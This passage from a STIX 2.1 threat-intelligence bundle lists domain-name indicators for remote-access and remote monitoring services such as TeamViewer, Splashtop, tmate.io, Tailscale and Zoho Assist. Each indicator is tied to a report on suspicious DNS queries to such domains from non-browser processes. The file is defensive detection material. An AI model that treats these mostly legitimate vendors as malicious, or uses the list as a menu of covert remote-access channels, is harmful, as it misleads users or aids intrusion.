      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c4bdadfe-9750-532f-a6ab-ee6afbbff0b3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--2be5b56d-ca69-5fa4-97d3-1ba951708352"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ee392c4c-540f-5794-91fd-98805f4c00c4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: sorillus.com",
      "pattern": "[domain-name:value = 'sorillus.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--11d1675a-8e08-5eb6-8203-f09f44fff3ae",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--ee392c4c-540f-5794-91fd-98805f4c00c4"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--4b46ca57-4c99-5d90-b76e-90409a020fc8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: splashtop.com",
      "pattern": "[domain-name:value = 'splashtop.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--be6a0421-1594-53ae-bf42-f80d054a6272",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--4b46ca57-4c99-5d90-b76e-90409a020fc8"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--31651e16-46dd-510a-8a8a-8ea5c8f4468e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: splashtop.eu",
      "pattern": "[domain-name:value = 'splashtop.eu']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--17dd4adc-76a1-5d4c-a63b-3cca49482566",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--31651e16-46dd-510a-8a8a-8ea5c8f4468e"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c3f2959b-4e7f-5850-bbf2-68da48e83caf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: spyanywhere.com",
      "pattern": "[domain-name:value = 'spyanywhere.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ed8aa5d4-9729-531e-a04a-b348e6d7a2bc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--c3f2959b-4e7f-5850-bbf2-68da48e83caf"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a9bdac41-1cb8-53fa-bccc-e1c706921120",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: spytech-web.com",
      "pattern": "[domain-name:value = 'spytech-web.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b96872b4-1386-5411-8769-50f3356e5741",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--a9bdac41-1cb8-53fa-bccc-e1c706921120"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--148efc23-a83c-5800-94ee-9b1d24814528",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: startsupport.com",
      "pattern": "[domain-name:value = 'startsupport.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--dfff6d1b-6ae1-58f2-8283-7c41c4292536",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--148efc23-a83c-5800-94ee-9b1d24814528"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ef5c5860-fe09-515d-9a89-b65d7b763216",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: superops.ai",
      "pattern": "[domain-name:value = 'superops.ai']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2dea1cfd-6ba4-5159-b252-2ed841c2bf24",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--ef5c5860-fe09-515d-9a89-b65d7b763216"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d8a2ed8f-7c8d-51aa-931d-72ac152ba9dc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: superops.com",
      "pattern": "[domain-name:value = 'superops.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bfc68a03-df69-501f-af19-87b0cdc28d7d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--d8a2ed8f-7c8d-51aa-931d-72ac152ba9dc"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d06a2c1a-c4dd-5d89-978b-9b732d585c1b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: superopsalpha.com",
      "pattern": "[domain-name:value = 'superopsalpha.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d7ec4fd7-8623-5b27-891c-3d19b959b2b8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--d06a2c1a-c4dd-5d89-978b-9b732d585c1b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--6719ec6a-32dd-5d92-b2ad-e80985dd0e47",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: superopsbeta.com",
      "pattern": "[domain-name:value = 'superopsbeta.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2e15e9b3-1723-5407-8bfb-7cfb5bae6599",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--6719ec6a-32dd-5d92-b2ad-e80985dd0e47"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--657d8b80-52b0-5682-a1c4-eb9e2cdd57ff",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: supremocontrol.com",
      "pattern": "[domain-name:value = 'supremocontrol.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c1729c7e-6de6-5644-80e1-92df52e118ea",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--657d8b80-52b0-5682-a1c4-eb9e2cdd57ff"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f526e308-f5d5-5e26-8499-96c0efabfbd1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: swi-rc.com",
      "pattern": "[domain-name:value = 'swi-rc.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--72914fad-a56a-51d0-b287-ca150f2fcd55",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--f526e308-f5d5-5e26-8499-96c0efabfbd1"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--9605fe63-22b3-59e2-9eb4-7068656c48eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: swi-tc.com",
      "pattern": "[domain-name:value = 'swi-tc.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c6c569a3-1619-579f-be6e-16f670db0611",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--9605fe63-22b3-59e2-9eb4-7068656c48eb"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--239b9d7b-a330-587c-8633-6f818b9956d5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: syncroapi.com",
      "pattern": "[domain-name:value = 'syncroapi.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--93e9a0c1-2700-53b2-ac60-510d3b23a402",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--239b9d7b-a330-587c-8633-6f818b9956d5"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e6aa9970-fe5d-5dbc-a4fc-1cc449debe4d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: syncromsp.com",
      "pattern": "[domain-name:value = 'syncromsp.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0faf04fe-5c2a-5807-89db-2e86b18a09f1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--e6aa9970-fe5d-5dbc-a4fc-1cc449debe4d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a1ca749a-f6fd-5541-9e88-85ddeb10dfb1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: syspectr.com",
      "pattern": "[domain-name:value = 'syspectr.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9c10b240-3458-5728-83f9-651fd4198ebd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--a1ca749a-f6fd-5541-9e88-85ddeb10dfb1"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--bb46d4f9-008d-54f9-be03-fc65c78ea4f8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: system-monitor.com",
      "pattern": "[domain-name:value = 'system-monitor.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5061077f-7041-55c0-a020-70a707b12caf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--bb46d4f9-008d-54f9-be03-fc65c78ea4f8"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--3224b120-c8b9-590c-8a47-c05afb17ba13",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: systemmonitor.us",
      "pattern": "[domain-name:value = 'systemmonitor.us']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c4edfe0e-9903-5156-8d7b-38c2dba563b3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--3224b120-c8b9-590c-8a47-c05afb17ba13"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--6259fb22-d586-5cf0-909e-3383cd448a9d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: tacticalrmm.com",
      "pattern": "[domain-name:value = 'tacticalrmm.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bfb971a3-8193-50f1-9945-974b68b299d0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--6259fb22-d586-5cf0-909e-3383cd448a9d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--dcea2b75-d423-5b16-8e98-dc54a2df8c89",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: tailscale.com",
      "pattern": "[domain-name:value = 'tailscale.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f8e89048-0bc8-54c2-8cb1-f232aa568ae0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--dcea2b75-d423-5b16-8e98-dc54a2df8c89"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--4838dd9f-9b36-5357-ae36-1adea1d139f9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: teamviewer.com",
      "pattern": "[domain-name:value = 'teamviewer.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fbe8c253-2107-5377-8181-f938f6ab5849",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--4838dd9f-9b36-5357-ae36-1adea1d139f9"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a18d87ef-cf89-5821-b2e1-74e9924585cb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: techinline.net",
      "pattern": "[domain-name:value = 'techinline.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--36c8b529-c412-5b2a-8776-f35904368a9f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--a18d87ef-cf89-5821-b2e1-74e9924585cb"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0a535522-c7d4-5c37-80de-bccf6437998d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: tele-desk.com",
      "pattern": "[domain-name:value = 'tele-desk.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6845c45a-d5b5-5da4-ba93-627f932145e8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--0a535522-c7d4-5c37-80de-bccf6437998d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--bda66753-13cd-5496-b5c0-225db94b1438",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: tiflux.com",
      "pattern": "[domain-name:value = 'tiflux.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3aff45b9-b21b-5a49-8258-7018108e243a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--bda66753-13cd-5496-b5c0-225db94b1438"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c0219a83-cdcc-5192-8d92-2c8f43fd895d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: tightvnc.com",
      "pattern": "[domain-name:value = 'tightvnc.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f50119e7-d2e7-5a76-8dc4-95e26d62382c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--c0219a83-cdcc-5192-8d92-2c8f43fd895d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--fb4bd209-1dc0-5c56-82df-24b6187e7bba",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: tmate.io",
      "pattern": "[domain-name:value = 'tmate.io']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cd54375e-86e6-53f8-801f-9858d4da70d9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--fb4bd209-1dc0-5c56-82df-24b6187e7bba"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c843de06-7a3a-50b2-b660-ce44bf606759",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: todesk.com",
      "pattern": "[domain-name:value = 'todesk.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--07a27bc8-a113-5183-b28e-267e064f8948",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--c843de06-7a3a-50b2-b660-ce44bf606759"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--6d27ddfd-afe1-5323-8b63-7f23557ccded",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: twingate.com",
      "pattern": "[domain-name:value = 'twingate.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6e3e1856-1fee-5ac4-96e2-7050558b4339",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--6d27ddfd-afe1-5323-8b63-7f23557ccded"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0f6f4d2f-c42a-5332-a966-cc5e4343b67f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ultraviewer.net",
      "pattern": "[domain-name:value = 'ultraviewer.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b7800abd-c5ba-51a9-937f-e98aae5a0677",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--0f6f4d2f-c42a-5332-a966-cc5e4343b67f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--171a8348-cdf9-58b6-b08d-1ce56b4ad12f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ultravnc.com",
      "pattern": "[domain-name:value = 'ultravnc.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e83922a7-7e88-5595-ab0b-1bc91ffc9573",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--171a8348-cdf9-58b6-b08d-1ce56b4ad12f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ad957e21-5f35-59fc-bbdd-d0e78b3157b6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: vnc.com",
      "pattern": "[domain-name:value = 'vnc.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--012cbe0f-22c6-57c5-9965-61bd4d8d81fc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--ad957e21-5f35-59fc-bbdd-d0e78b3157b6"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--dbe4be87-5da3-5d17-bd8f-167ed51fd519",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: weezo.me",
      "pattern": "[domain-name:value = 'weezo.me']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4aeae052-4fe1-58e2-97b5-34dcd0cc51fa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--dbe4be87-5da3-5d17-bd8f-167ed51fd519"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e05eb3e2-457d-5fe8-8ddf-2df4d59f117b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: weezo.net",
      "pattern": "[domain-name:value = 'weezo.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e4ca70ab-691a-5b4d-8dd4-26ddd632870a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--e05eb3e2-457d-5fe8-8ddf-2df4d59f117b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d5a91426-a08c-5c72-be3f-abd66f11139d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: xeox.com",
      "pattern": "[domain-name:value = 'xeox.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a4dafa6b-5317-51de-b3a2-95995d0902a2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--d5a91426-a08c-5c72-be3f-abd66f11139d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--669cb6b4-bafa-55c2-89a0-53a68918ccd0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: zoho.eu",
      "pattern": "[domain-name:value = 'zoho.eu']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7bd8b43a-74ce-5ab7-86ad-9ca5778d15fa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--669cb6b4-bafa-55c2-89a0-53a68918ccd0"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--656f542a-4c92-5ec1-971c-9c23904dfae9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: zohoassist.com",
      "pattern": "[domain-name:value = 'zohoassist.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8330e03b-ef66-51c8-abce-c0af6a11d499",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--656f542a-4c92-5ec1-971c-9c23904dfae9"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--8e6028ba-cc13-5264-8fce-0a0940a9f826",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: zohoassist.jp",
      "pattern": "[domain-name:value = 'zohoassist.jp']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--54f38d7e-b41f-58fe-a8e7-6b733a2c98ac",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--8e6028ba-cc13-5264-8fce-0a0940a9f826"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Suspicious DNS Queries to Remote Monitoring and Management Domains from Non-Browser Processes",
